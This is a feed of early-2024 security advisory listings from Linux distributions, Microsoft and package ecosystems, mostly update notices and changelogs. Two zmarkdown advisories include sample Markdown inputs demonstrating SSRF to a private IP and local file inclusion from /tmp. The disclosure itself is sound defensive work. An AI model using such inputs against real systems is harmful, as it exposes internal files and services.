31.01.2024 02:00:00	gentoo	[GLSA-202401-34] Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-34
31.01.2024 02:00:00	oraclelinux	[ELSA-2024-0557] tigervnc security update (important)	[1.13.1-3.6]- Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice Resolves: RHEL-20389- Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent Resolves: RHEL-20383- Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access Resolves: RHEL-20533- Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer Resolves: RHEL-21213	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0557
31.01.2024 02:00:00	oraclelinux	[ELSA-2024-0602] thunderbird security update (important)	[115.7.0-1.0.1]- Update to 115.7.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0602
31.01.2024 02:00:00	oraclelinux	[ELSA-2024-0608] firefox security update (important)	[115.7.0.1.0.1]- Update to 115.7.0 build 1[115.6.0-1.0.1]- Update to 115.6.0 build1- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.5.0-1.0.1]- Update to 115.5.0 build1- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.4.0-1.0.1]- Update to 115.4.0 build1- Add fix for CVE-2023-44488- Set homepage from os-release HOME_URL[115.3.1-1.0.1]- Update to 115.3.1[102.15.1-1.0.1]- Update to 102.15.1 build2[102.15.0-1.0.1]- Update to 102.15.0 build2[102.14.0-1.0.1]- Updated homepages to use https [Orabug: 34648274]- Removed Upstream references- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[102.14.0-1]- Update to 102.14.0 build1[102.13.0-2]- Update to 102.13.0 build2[102.13.0-1]- Update to 102.13.0 build1[102.12.0-1]- Update to 102.12.0 build1[102.11.0-2]- Do not import cert to certdb on override exception: rhbz#2118991 mzbz@1833330[102.11.0-2]- Update to 102.11.0 build2[102.11.0-1]- Update to 102.11.0 build1[102.10.0-1]- Update to 102.10.0 build1[102.9.0-4]- Update to 102.9.0 build2[102.9.0-2]- removed disable-openh264-download[102.9.0-1]- Update to 102.9.0 build1[102.8.0-2]- Update to 102.8.0 build2[102.8.0-1]- Update to 102.8.0 build1[102.7.0-1]- Update to 102.7.0 build1[102.6.0-2]- Add firefox-x11 subpackage to allow explicit run of firefox under x11 on RHEL9[102.6.0-1]- Update to 102.6.0 build1[102.5.0-2]- Added libwebrtc screencast patch for newer features[102.5.0-1]- Update to 102.5.0 build1[102.4.0-1]- Update to 102.4.0 build1[102.3.0-7]- Fix for expat CVE-2022-40674 and non functional webrtc[102.3.0-6]- Update to 102.3.0 build1[91.12.0-1]- Update to 91.12.0 build1[91.11.0-2]- Update to 91.11.0 build2[91.11.0-1]- Update to 91.11.0 build1[91.10.0-1]- Update to 91.10.0 build1[91.9.1-1]- Update to 91.9.1 build1[91.9.0-1]- Update to 91.9.0[91.8.0-1]- Update to 91.8.0[91.7.0-3]- Update to 91.7.0 build3[91.7.0-2]- Added expat backports of CVE-2022-25235, CVE-2022-25236 and CVE-2022-25315[91.7.0-1]- Update to 91.7.0 build2[91.6.0-2]- Install langpacks to the browser/extensions to make them available in UI: rhbz#2030190[91.6.0-1]- Update to 91.6.0 build1[91.5.0-2]- Use default update channel to fix non working enterprise policies: rhbz#2044667[91.5.0-1]- Update to 91.5.0 build1[91.4.0-2]- Added fix for failing addons signatures.[91.4.0-1]- Update to 91.4.0 build1[91.3.0-1]- Update to 91.3.0 build1[91.2.0-5]- Fixed crashes when FIPS is enabled.[91.2.0-4]- Disable webrender on the s390x due to wrong colors: rhbz#2009503[91.2.0-3]- Update to 91.2.0 build1[91.1.0-1]- Update to 91.1.0 build1* Tue Aug 17 2021 Jan Horak <jhorak@redhat.com>- Update to 91.0.1 build1[91.0-1]- Update to 91.0 ESR[91.0-1]- Update to 91.0b8[78.12.0-2]- Rebuild to pickup older nss[78.12.0-1]- Update to 78.12.0 build1[78.11.0-3]- Update to 78.11.0 build2 (release)[78.11.0-2]- Fix rhel_minor_version for dist .el8_4 and .el8[78.11.0-1]- Update to 78.11.0 build1[78.10.0-1]- Update to 78.10.0[78.9.0-1]- Update to 78.9.0 build1[78.8.0-1]- Update to 78.8.0 build2[78.7.1-1]- Update to 78.7.1[78.7.0-3]- Fixing install prefix for the homepage[78.7.0-2]- Update to 78.7.0 build2[78.7.0-1]- Update to 78.7.0 build1[78.6.1-1]- Update to 78.6.1 build1[78.6.0-1]- Update to 78.6.0 build1[78.5.0-1]- Update to 78.5.0 build1* Tue Nov 10 2020 erack@redhat.com - 78.4.1-1- Update to 78.4.1[78.4.0-3]- Fixing flatpak build, fixing firefox.sh.in to not disable langpacks loading[78.4.0-2]- Enable addon sideloading[78.4.0-1]- Update to 78.4.0 build2* Fri Sep 18 2020 Jan Horak <jhorak@redhat.com>- Update to 78.3.0 build1[78.2.0-3]- Update to 78.2.0 build1* Fri Jul 24 2020 Jan Horak <jhorak@redhat.com>- Update to 68.11.0 build1* Fri Jun 26 2020 Jan Horak <jhorak@redhat.com>- Update to 68.10.0 build1* Fri May 29 2020 Jan Horak <jhorak@redhat.com>- Update to 68.9.0 build1- Added patch for pipewire 0.3* Mon May 11 2020 Jan Horak <jhorak@redhat.com>- Added s390x specific patches* Wed Apr 29 2020 Jan Horak <jhorak@redhat.com>- Update to 68.8.0 build1[68.7.0-3]- Added fix for rhbz#1821418[68.7.0-2]- Update to 68.7.0 build3[68.6.1-1]- Update to 68.6.1 ESR* Wed Mar 04 2020 Jan Horak <jhorak@redhat.com>- Update to 68.6.0 build1[68.5.0-3]- Added fix for rhbz#1805667- Enabled mzbz@1170092 - Firefox prefs at /etc* Fri Feb 07 2020 Jan Horak <jhorak@redhat.com>- Update to 68.5.0 build2* Wed Feb 05 2020 Jan Horak <jhorak@redhat.com>- Update to 68.5.0 build1* Wed Jan 08 2020 Jan Horak <jhorak@redhat.com>- Update to 68.4.1esr build1* Fri Jan 03 2020 Jan Horak <jhorak@redhat.com>- Update to 68.4.0esr build1* Wed Dec 18 2019 Jan Horak <jhorak@redhat.com>- Fix for wrong intl.accept_lang when using non en-us langpack[68.3.0-1]- Update to 68.3.0 ESR[68.2.0-4]- Added patch for TLS 1.3 support.[68.2.0-3]- Rebuild[68.2.0-2]- Rebuild[68.2.0-1]- Update to 68.2.0 ESR[68.1.0-6]- Enable system nss on RHEL6[68.1.0-2]- Enable building langpacks[68.1.0-1]- Update to 68.1.0 ESR[68.0.1-4]- Enable system nss[68.0.1-3]- Enable official branding[68.0.1-2]- Enabled PipeWire on RHEL8[68.0.1-1]- Updated to 68.0.1 ESR[68.0-0.11]- Update to 68.0 ESR[68.0-0.10]- Updated to 68.0 alpha 13- Enabled second arches[68.0-0.1]- Updated to 68.0 alpha[60.6.0-3]- Added Google API keys (mozbz#1531176)[60.6.0-2]- Update to 60.6.0 ESR (Build 2)[60.6.0-1]- Update to 60.6.0 ESR (Build 1)[60.5.1-1]- Update to 60.5.1 ESR[60.5.0-3]- Added fix for rhbz#1672424 - Firefox crashes on NFS drives.[60.5.0-2]- Updated to 60.5.0 ESR build2[60.5.0-1]- Updated to 60.5.0 ESR build1[60.4.0-3]- Fixing fontconfig warnings (rhbz#1601475)[60.4.0-2]- Added pipewire patch from Tomas Popela (rhbz#1664270)[60.4.0-1]- Update to 60.4.0 ESR[60.3.0-2]- Added firefox-gnome-shell-extension[60.3.0-1]- Update to 60.3.0 ESR[60.2.2-2]- Added patch for rhbz#1633932[60.2.2-1]- Update to 60.2.2 ESR[60.2.1-1]- Update to 60.2.1 ESR[60.2.0-1]- Update to 60.2.0 ESR[60.1.0-9]- Do not set user agent (rhbz#1608065)- GTK dialogs are localized now (rhbz#1619373)- JNLP association works again (rhbz#1607457)[60.1.0-8]- Fixed homepage and bookmarks (rhbz#1606778)- Fixed missing file associations in RHEL6 (rhbz#1613565)[60.1.0-7]- Run at-spi-bus if not running already (for the bundled gtk3)[60.1.0-6]- Fix for missing schemes for bundled gtk3[60.1.0-5]- Added mesa-libEGL dependency to gtk3/rhel6[60.1.0-4]- Disabled jemalloc on all second arches[60.1.0-3]- Updated to 60.1.0 ESR build2[60.1.0-2]- Disabled jemalloc on second arches[60.1.0-1]- Updated to 60.1.0 ESR[60.0-12]- Fixing bundled libffi issues- Readded some requirements[60.0-10]- Added fix for mozilla BZ#1436242 - IPC crashes.[60.0-9]- Bundling libffi for the sec-arches- Added openssl-devel for the Python- Fixing bundled gtk3[60.0-8]- Added fix for mozilla BZ#1458492[60.0-7]- Added patch from rhbz#1498561 to fix ppc64(le) crashes.[60.0-6]- Disabled jemalloc on second arches[60.0-4]- Update to 60.0 ESR[52.7.0-1]- Update to 52.7.0 ESR[52.6.0-2]- Build Firefox for desktop arches only (x86_64 and ppc64le)[52.6.0-1]- Update to 52.6.0 ESR[52.5.0-1]- Update to 52.5.0 ESR[52.4.0-1]- Update to 52.4.0 ESR[52.3.0-3]- Update to 52.3.0 ESR (b2)- Require correct nss version[52.2.0-1]- Update to 52.2.0 ESR[52.1.2-1]- Update to 52.1.2 ESR[52.0-7]- Added fix for accept language (rhbz#1454322)[52.0-6]- Removing patch required for older NSS from RHEL 7.3- Added patch for rhbz#1414564[52.0-5]- Added fix for mozbz#1348168/CVE-2017-5428[52.0-4]- Update to 52.0 ESR (b4)[52.0-3]- Added fix for rhbz#1423012 - ppc64 gfx crashes[52.0-2]- Enable system nss[52.0-1]- Update to 52.0ESR (B1)- Build RHEL7 package for Gtk3[52.0-0.13]- Added fix for rhbz#1414535[52.0-0.12]- Update to 52.0b8[52.0-0.11]- Readded addons patch[52.0-0.10]- Update to 52.0b3[52.0-0.9]- Update to 52.0b2[52.0-0.8]- Update to 52.0b1[52.0-0.5]- Firefox Aurora 52 testing build	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0608
31.01.2024 02:00:00	redhat	[RHSA-2024:0627] gnutls security update (moderate)	The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0627
31.01.2024 02:00:00	redhat	[RHSA-2024:0628] libssh security update (moderate)	libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0628
31.01.2024 02:00:00	oraclelinux	[ELSA-2024-0609] thunderbird security update (important)	[115.7.0-1.0.1]- Update to 115.7.0 build1[115.6.0-1.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js[115.6.0-1]- Update to 115.6.0 build2[115.5.0-1]- Update to 115.5.0 build1[115.4.1-1]- Update to 115.4.1 build1[115.4.0-3]- Update to 115.4.0 build3[115.4.0-2]- Update to 115.4.0 build2[115.4.0-1]- Update to 115.4.0 build1[115.3.1-1]- Update to 115.3.1 build1[115.3.0-1]- Update to 115.3.0[115.2.1-5]- Update to 115.2.1[102.11.0-1]- Update to 102.11.0 build1[102.10.0-2]- Update to 102.10.0 build2[102.10.0-1]- Update to 102.10.0 build1[102.9.0-2]- Update to 102.9.0 build1[102.8.0-2]- Update to 102.8.0 build2[102.8.0-1]- Update to 102.8.0 build1[102.7.1-2]- Update to 102.7.1 build2[102.7.1-1]- Update to 102.7.1 build1[102.7.0-1]- Update to 102.7.0 build1[102.6.0-2]- Update to 102.6.0 build2[102.6.0-1]- Update to 102.6.0 build1[102.5.0-3]- Use openssl for the librnp crypto backend to enable the openpgp encryption[102.5.0-2]- Update to 102.5.0 build2[102.5.0-1]- Update to 102.5.0 build1[102.4.0-1]- Update to 102.4.0 build1[102.3.0-4]- Fix for expat CVE-2022-40674[102.3.0-3]- Update to 102.3.0 build1[91.13.0-1]- Update to 91.13.0 build1[91.12.0-1]- Update to 91.12.0 build1[91.11.0-2]- Update to 91.11.0 build2[91.11.0-1]- Update to 91.11.0 build1[91.10.0-1]- Update to 91.10.0 build1[91.9.1-1]- Update to 91.9.1 build1[91.9.0-3]- Update to 91.9.0 build3[91.9.0-2]- Update to 91.9.0 build2[91.9.0-1]- Update to 91.9.0[91.8.0-1]- Update to 91.8.0[91.7.0-2]- Update to 91.7.0 build2[91.7.0-1]- Update to 91.7.0 build1[91.6.0-2]- Move appdata to metainfo and use stock icon instead of remote[91.6.0-1]- Update to 91.6.0 build1[91.5.0-3]- Using upstream appdata file[91.5.0-2]- Enabled optimalization for s390x[91.5.0-1]- Update to 91.5.0 build1[91.4.0-2]- Update to 91.4.0 build2[91.4.0-1]- Update to 91.4.0 build1[91.3.0-2]- Update to 91.3.0 build2[91.3.0-1]- Update to 91.3.0 build1[91.2.0-1]- Update to 91.2.0[78.14.0-1]- Update to 78.14.0[78.13.0-2]- Rebuilt for libffi 3.4.2 SONAME transition. Related: rhbz#1891914[78.13.0-1]- Update to 78.13.0[78.12.0-4]- Rebuilt for IMA sigs, glibc 2.34, aarch64 flags Related: rhbz#1991688[78.12.0-3]- Add script to process the official tarball to comply with PELC review- Fix the build with newer glibc[78.12.0-2]- Update to 78.12.0 build2[78.12.0-1]- Update to 78.12.0 build1[78.11.0-2]- Added bundled libraries, update to 78.11[78.8.0-5]- Rebuilt for RHEL 9 BETA for openssl 3.0 Related: rhbz#1971065[78.8.0-4]- Rebuilt for RHEL 9 BETA on Apr 15th 2021. Related: rhbz#1947937- Fixing MOZ_SMP_FLAGS[78.8.0-2]- Removed autoconf213 dependency[78.8.0-1]- Update to 78.8.0 build1[78.6.1-1]- Update to 78.6.1[78.6.0-1]- Update to 78.6.0[78.5.1-1]- Update to 78.5.1 build1[78.5.0-1]- Update to 78.5.0 build3[78.4.3-1]- Update to 78.4.3[78.4.0-1]- Update to 78.4.0 build1- Disabled telemetry[78.3.1-1]- Update to 78.3.1 build1[78.3.0-3]- Update to 78.3.0 build1- Remove librdp.so as long as we cannot ship it in RHEL[78.2.1-1]- Update to 78.2.1 build1[68.12.0-1]- Update to 68.12.0 build1[68.11.0-1]- Update to 68.11.0 build1[68.10.0-1]- Update to 68.10.0 build1[68.9.0-1]- Update to 68.9.0 build1[68.8.0-1]- Update to 68.8.0 build2[68.7.0-1]- Update to 68.7.0 build1[68.6.0-1]- Update to 68.6.0 build2[68.5.0-1]- Update to 68.5.0 build1[68.4.1-2]- Update to 68.4.1 build1[68.3.0-2]- Update to 68.3.0 build2[68.2.0-2]- Added patch for TLS 1.3 support.[68.2.0-1]- Update to 68.2.0[68.1.1-2]- Update to 68.1.1[60.9.0-2]- Update to 60.9.0[60.8.0-1]- Updated to 60.8.0[60.7.2-3]- Rebuild to fix rhbz#1725919 - Thunderbird fails to authenticate with gmail with ssl/tls and OAuth2.	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0609
31.01.2024 02:00:00	redhat	[RHSA-2024:0629] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0629
31.01.2024 12:16:15	almalinux	[ALSA-2024:0606] openssh security update (moderate)	openssh security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0606
31.01.2024 12:11:00	almalinux	[ALSA-2024:0607] tigervnc security update (important)	tigervnc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0607
31.01.2024 13:00:39	almalinux	[ALSA-2024:0557] tigervnc security update (important)	tigervnc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0557
01.02.2024 00:39:01	maven	[MAVEN:GHSA-8J3X-W35R-RW4R] Quarkus Improper Handling of Insufficient Permissions or Privileges and Improper Handling of Exceptional Conditions vulnerability (high)	A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8J3X-W35R-RW4R
01.02.2024 21:55:43	msrc	[MS:CVE-2024-1077] Chromium: CVE-2024-1077 Use after free in Network		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1077
01.02.2024 21:55:41	msrc	[MS:CVE-2024-1059] Chromium: CVE-2024-1059 Use after free in WebRTC		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1059
01.02.2024 21:55:37	msrc	[MS:CVE-2024-1060] Chromium: CVE-2024-1060 Use after free in Canvas		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1060
01.02.2024 19:45:01	ubuntu	[USN-6621-1] ImageMagick vulnerability (medium)	ImageMagick could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6621-1
01.02.2024 15:22:21	ubuntu	[USN-6587-4] X.Org X Server regression	A regression was fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-4
01.02.2024 14:41:59	ubuntu	[USN-6620-1] GNU C Library vulnerabilities (high)	GNU C Library could be made to crash or run programs as an administratorif it handled a specially crafted request.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6620-1
01.02.2024 10:00:00	msrc	[MS:CVE-2024-21399] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21399
01.02.2024 02:00:00	debian	[DSA-5613-1] openjdk-17 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5613-1
01.02.2024 02:00:00	debian	[DSA-5612-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5612-1
01.02.2024 02:00:00	oraclelinux	[ELSA-2024-0606] openssh security update (moderate)	[8.0p1-19.2]- Forbid shell metasymbols in username/hostname Resolves: CVE-2023-51385- Fix Terrapin attack Resolves: CVE-2023-48795	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0606
01.02.2024 02:00:00	oraclelinux	[ELSA-2024-0628] libssh security update (moderate)	[0.9.6-13]- Client and Server side mitigations (CVE-2023-48795)- Strip extensions from both kex lists for matching (CVE-2023-48795)- tests: Adjust calculation to strict kex (CVE-2023-48795)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0628
01.02.2024 02:00:00	oraclelinux	[ELSA-2024-0647] rpm security update (moderate)	[4.14.3-28.0.1]- Fixed infinte loop for db_create with error check [Orabug: 36202920][4.14.3-28]- Backport file handling code from rpm-4.19 to fix CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939[4.14.3-27]- Make brp-python-bytecompile script compatible with Python 3.10+Resolves: RHEL-6423	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0647
01.02.2024 02:00:00	redhat	[RHSA-2024:0647] rpm security update (moderate)	The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.Security Fix(es):* rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)* rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938)* rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0647
01.02.2024 02:00:00	oraclelinux	[ELSA-2024-0629] tigervnc security update (important)	[1.8.0-31.0.1]- Dropped xorg-CVE-2023-5367.patch, xorg-CVE-2023-6816.patch, xorg-CVE-2023-6377.patch, xorg-CVE-2023-6478.patch, xorg-CVE-2024-0229-1.patch, xorg-CVE-2024-0229-2.patch, xorg-CVE-2024-0229-3.patch, xorg-CVE-2024-21885.patch, xorg-CVE-2024-21886-1.patch, xorg-CVE-2024-21886-2.patch, xorg-dix-fix-use-after-free-in-input-device-shutdown.patch[1.8.0-31]- Fix use after free related to CVE-2024-21886 Resolves: RHEL-20436- Fix copy/paste error in the DeviceStateNotify Resolves: RHEL-20587[1.8.0-30]- Don't try to get pointer position when the pointer becomes a floating device Resolves: RHEL-20436[1.8.0-29]- Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice Resolves: RHEL-20436- Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent Resolves: RHEL-20427- Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access Resolves: RHEL-20587- Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer Resolves: RHEL-21212	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0629
01.02.2024 11:02:43	almalinux	[ALSA-2024:0628] libssh security update (moderate)	libssh security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0628
01.02.2024 11:14:27	almalinux	[ALSA-2024:0627] gnutls security update (moderate)	gnutls security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0627
01.02.2024 11:44:40	almalinux	[ALSA-2024:0609] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0609
01.02.2024 11:58:53	almalinux	[ALSA-2024:0608] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0608
01.02.2024 12:06:48	almalinux	[ALSA-2024:0603] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0603
01.02.2024 12:12:30	almalinux	[ALSA-2024:0602] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0602
03.02.2024 02:38:23	npm	[NPM:GHSA-MF74-QQ7W-6J7V] Zmarkdown Server-Side Request Forgery (SSRF) in remark-download-images (moderate)	### ImpactA major blind SSRF has been found in `remark-images-download`, which allowedfor requests to be made to neighboring servers on local IP ranges.The issue came from a loose filtering of URLs inside the module.Imagine a server running on a private network `192.168.1.0/24`.A private service serving images is running on `192.168.1.2`, andis not expected to be accessed by users. A machine is running`remark-images-download` on the neighboring `192.168.1.3` host.An user enters the following Markdown:```markdown![](http://192.168.1.2/private-img.png)```The image is downloaded by the server and included inside the resultingdocument. Hence, the user has access to the private image.It has been corrected by preventing images downloads fromlocal IP ranges, both in IPv4 and IPv6.To avoid malicious domain names, resolved local IPs from are alsoforbidden inside the module.This vulnerability impact is moderate, as it is can allow access tounexposed documents on the local network, and is very easyto exploit.### PatchesThe vulnerability has been patched in version 3.1.0.If impacted, you should update to this version as soon as possible.Please note that a minor version has been released instead of a bugfix.This is due to a new option included to prevent another vulnerability,upgrading to the new version will not break compatibility.### WorkaroundsNo workaround is known, the package should be upgraded.### For more informationIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MF74-QQ7W-6J7V
03.02.2024 02:37:56	npm	[NPM:GHSA-MQ6V-W35G-3C97] Local File Inclusion vulnerability in zmarkdown (low)	### ImpactA minor Local File Inclusion vulnerability has been found in`zmarkdown`, which allowed for images with a known path onthe host machine to be included inside a LaTeX document.To prevent it, a new option has been created that allow to replaceinvalid paths with a default image instead of linking the image on thehost directly. `zmarkdown` has been updated to make this setting thedefault.Every user of `zmarkdown` is likely impacted, except ifdisabling LaTeX generation or images download. Hereis an example of including an image from an invalid path:```markdown![](/tmp/img.png)```Will effectively redownload and include the imagefound at `/tmp/img.png`.### PatchesThe vulnerability has been patched in version 10.1.3.If impacted, you should update to this version as soon as possible.### WorkaroundsDisable images downloading, or sanitize paths.### For more informationIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQ6V-W35G-3C97
02.02.2024 22:17:32	npm	[NPM:GHSA-V269-RRR6-CX6R] Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm. (moderate)	Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V269-RRR6-CX6R
02.02.2024 22:59:10	maven	[MAVEN:GHSA-2MRQ-W8PV-5PVQ] Malicious input can provoke XSS when preserving comments (moderate)	# ImpactThere is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output.# PatchesPatched in AntiSamy 1.7.5 and later. This is due to parsing behavior in the [neko-htmlunit](https://github.com/HtmlUnit/htmlunit-neko) dependency, just by updating to a newer version the issue was solved. See important remediation details in the reference given below.# WorkaroundsIf you cannot upgrade to a fixed version of the library, the following mitigation can be applied until you can upgrade: Manually edit your AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present.As the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in the parser dependency (neko-htmlunit) and therefore in AntiSamy. The safety of this workaround relies on configurations that may change in the future and don't address the root cause of the vulnerability. As such, it is strongly recommended to upgrade to a fixed version of AntiSamy.# For more informationIf you have any questions or comments about this advisory:Email one of the project co-leaders, listed on the [OWASP AntiSamy project](https://owasp.org/www-project-antisamy/) page, under "Leaders".	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2MRQ-W8PV-5PVQ
02.02.2024 18:55:27	maven	[MAVEN:GHSA-34Q3-P352-C7Q8] Central Dogma Authentication Bypass Vulnerability via Session Leakage (critical)	### Vulnerability OverviewA vulnerability has been identified in Central Dogma versions prior to 0.64.0, allowing for the leakage of user sessions and subsequent authentication bypass. The issue stems from a Cross-Site Scripting (XSS) attack vector that targets the RelayState of Security Assertion Markup Language (SAML).### ImpactSuccessful exploitation of this vulnerability enables malicious actors to leak user sessions, leading to the compromise of authentication mechanisms. This, in turn, can facilitate unauthorized access to sensitive resources.### PatchesThis vulnerability is addressed and resolved in Central Dogma version 0.64.0. Users are strongly encouraged to upgrade to this version or later to mitigate the risk associated with the authentication bypass.### WorkaroundsNo viable workarounds are currently available for this vulnerability. It is recommended to apply the provided patch promptly.### References- [OASIS SAML v2.0 Errata 05](https://docs.oasis-open.org/security/saml/v2.0/errata05/os/saml-v2.0-errata05-os.html#__RefHeading__8196_1983180497)- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-34Q3-P352-C7Q8
02.02.2024 18:55:22	maven	[MAVEN:GHSA-QFV2-3P2F-VG48] Duplicate Advisory: Central Dogma Authentication Bypass Vulnerability via Session Leakage (moderate)	## Duplicate AdvisoryThis advisory has been withdrawn because it is a duplicate of GHSA-34q3-p352-c7q8. This link is maintained to preserve external references.## Original DescriptionCentral Dogma versions prior to 0.64.0 is vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFV2-3P2F-VG48
02.02.2024 20:10:52	npm	[NPM:GHSA-547X-748V-VP6P] Dash apps vulnerable to Cross-site Scripting (moderate)	Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server.Note:This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-547X-748V-VP6P
